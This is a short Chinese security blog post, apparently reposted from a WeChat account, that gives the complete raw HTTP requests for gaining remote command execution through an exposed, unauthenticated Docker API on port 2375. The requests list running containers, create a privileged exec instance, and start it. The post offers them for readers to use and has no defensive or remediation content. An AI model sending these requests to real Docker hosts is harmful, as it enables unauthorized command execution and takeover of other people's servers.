docker api未授权导致RCE的http方式利用

admin

108582
文章

90
评论

2024年6月27日21:21:06评论4 views字数 1155阅读3分51秒阅读模式

前言

本文是群友投稿，在做项目时，遇见docker api rce，常规的方法是通过api创建恶意容器，但还有另一种方法可以无需创建容器，直接http利用，速度快很多，感谢群友分享！

本文提供完整流程的数据包，具体使用请自行研究，本文不做演示。

详细数据包

GET /containers/json HTTP/1.1User-Agent: Java/17.0.5Host: ip:2375Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

‍

POST /containers/195dd8c882f192b53ce38e88164a0936cc30d291f5286983671250659e08a4b2/exec HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:65.0) Gecko/20100101 Firefox/65.0Content-Type: application/jsonCache-Control: no-cachePragma: no-cacheHost: ip:2375Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-Length: 141{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Cmd":["id"],"DetachKeys":"ctrl-p,ctrl-q","Privileged":true,"Tty":true}

取出响应id

POST /exec/92839a23e062ba4f2f4b4ad7ad4625761bda6e832a7c4712234fc10e505ba355(响应id)/start HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:65.0) Gecko/20100101 Firefox/65.0Content-Type: application/jsonCache-Control: no-cachePragma: no-cacheHost: ip:2375Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-Length: 31{"Detach":false,"Tty":false}

原文始发于微信公众号（棉花糖网络安全圈）：docker api未授权导致RCE的http方式利用

左青龙
微信扫一扫

右白虎
微信扫一扫

docker api未授权导致RCE的http方式利用

什么是未授权访问漏洞？Hadoop & Redis靶场实战——Vulfocus服务攻防

绕过AMSI的另一种方式

web渗透测试——信息收集上（超详细）

【论文速读】| LLAMAFUZZ：大语言模型增强的灰盒模糊测试

华为账户信息一览表

FastJson-RCE (CVE-2017-18349) 漏洞复现

获取目标虚拟币网站权限的漏洞是Yapi RCE？

渗透信息收集1

使用 MS Windows 打印机通过互联网打印进行持久性/命令和控制的 PoC

调试案例研究：ViewState 反序列化利用

发表评论

在线咨询

微信